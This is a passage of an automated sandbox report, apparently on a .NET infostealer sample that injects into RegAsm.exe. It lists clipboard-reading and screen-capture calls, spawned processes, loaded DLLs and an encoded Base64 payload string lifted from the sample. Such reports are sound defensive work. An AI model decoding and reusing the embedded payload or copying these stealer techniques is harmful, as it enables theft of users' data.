          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042DFD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_0042DFD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042DFD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_0042DFD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042E923 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,5_2_0042E923

          System Summary

          barindex
          Source: nlJ2sNaZVi.exe, Iceberg.csLong String: Length: 18812
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004180C05_2_004180C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004328D05_2_004328D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043C0F05_2_0043C0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040D9225_2_0040D922
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00409A405_2_00409A40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00427A085_2_00427A08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004102145_2_00410214
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00408AF05_2_00408AF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043CB605_2_0043CB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042730E5_2_0042730E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042731B5_2_0042731B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040B3205_2_0040B320
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043BBF05_2_0043BBF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041CC705_2_0041CC70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004325505_2_00432550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041ADF05_2_0041ADF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004216405_2_00421640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040AE605_2_0040AE60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00413F3B5_2_00413F3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040CFFF5_2_0040CFFF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041E7B05_2_0041E7B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004068405_2_00406840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042D07E5_2_0042D07E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043A0205_2_0043A020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004330D05_2_004330D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004228855_2_00422885
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004210B05_2_004210B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043A8B05_2_0043A8B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004241665_2_00424166
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004139705_2_00413970
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004211745_2_00421174
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042D9205_2_0042D920
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004201F35_2_004201F3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004049905_2_00404990
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004061A05_2_004061A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004231A85_2_004231A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00422A5B5_2_00422A5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041FA5D5_2_0041FA5D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004112605_2_00411260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043AA005_2_0043AA00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00421AD05_2_00421AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00417AF85_2_00417AF8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043AB505_2_0043AB50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00419B605_2_00419B60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004163675_2_00416367
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00402B705_2_00402B70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004313795_2_00431379
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004283795_2_00428379
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00439B005_2_00439B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043B3305_2_0043B330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004211745_2_00421174
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00431BE05_2_00431BE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042DBB05_2_0042DBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004233B05_2_004233B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00410C595_2_00410C59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004284595_2_00428459
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043C4605_2_0043C460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042840A5_2_0042840A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004364D05_2_004364D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00420CDA5_2_00420CDA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00414CDC5_2_00414CDC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00406CE05_2_00406CE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00405CE05_2_00405CE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00435CE05_2_00435CE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00426CF35_2_00426CF3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004154F65_2_004154F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00427D4F5_2_00427D4F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043AD305_2_0043AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00427D365_2_00427D36
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042D5365_2_0042D536
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042DDD05_2_0042DDD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043BDD05_2_0043BDD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041DDFF5_2_0041DDFF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004035805_2_00403580
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004095905_2_00409590
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00431E405_2_00431E40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004336695_2_00433669
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00419E205_2_00419E20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042B6C25_2_0042B6C2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042BED05_2_0042BED0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004237105_2_00423710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042AF2B5_2_0042AF2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00403F305_2_00403F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004027C05_2_004027C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043C7D05_2_0043C7D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004077F05_2_004077F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004082E0 appears 50 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413520 appears 61 times
          Source: nlJ2sNaZVi.exe, 00000000.00000000.2018923511.0000000000B8E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameGlobally.exe: vs nlJ2sNaZVi.exe
          Source: nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000003034000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamev0t1l0co.dll4 vs nlJ2sNaZVi.exe
          Source: nlJ2sNaZVi.exe, 00000000.00000002.2052585783.0000000002E70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamev0t1l0co.dll4 vs nlJ2sNaZVi.exe
          Source: nlJ2sNaZVi.exe, 00000000.00000002.2051982616.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs nlJ2sNaZVi.exe
          Source: nlJ2sNaZVi.exeBinary or memory string: OriginalFilenameGlobally.exe: vs nlJ2sNaZVi.exe
          Source: nlJ2sNaZVi.exe, Iceberg.csBase64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
          Source: nlJ2sNaZVi.exe, Tp.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/7@11/3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004328D0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,5_2_004328D0
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nlJ2sNaZVi.exe.logJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_03
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeFile created: C:\Users\user\AppData\Local\Temp\v0t1l0coJump to behavior
          Source: nlJ2sNaZVi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: nlJ2sNaZVi.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: nlJ2sNaZVi.exeReversingLabs: Detection: 55%
          Source: unknownProcess created: C:\Users\user\Desktop\nlJ2sNaZVi.exe "C:\Users\user\Desktop\nlJ2sNaZVi.exe"
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEB5.tmp" "c:\Users\user\AppData\Local\Temp\v0t1l0co\CSC65BF410C392B47AC8396E849E0F657FD.TMP"
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline"Jump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEB5.tmp" "c:\Users\user\AppData\Local\Temp\v0t1l0co\CSC65BF410C392B47AC8396E849E0F657FD.TMP"Jump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
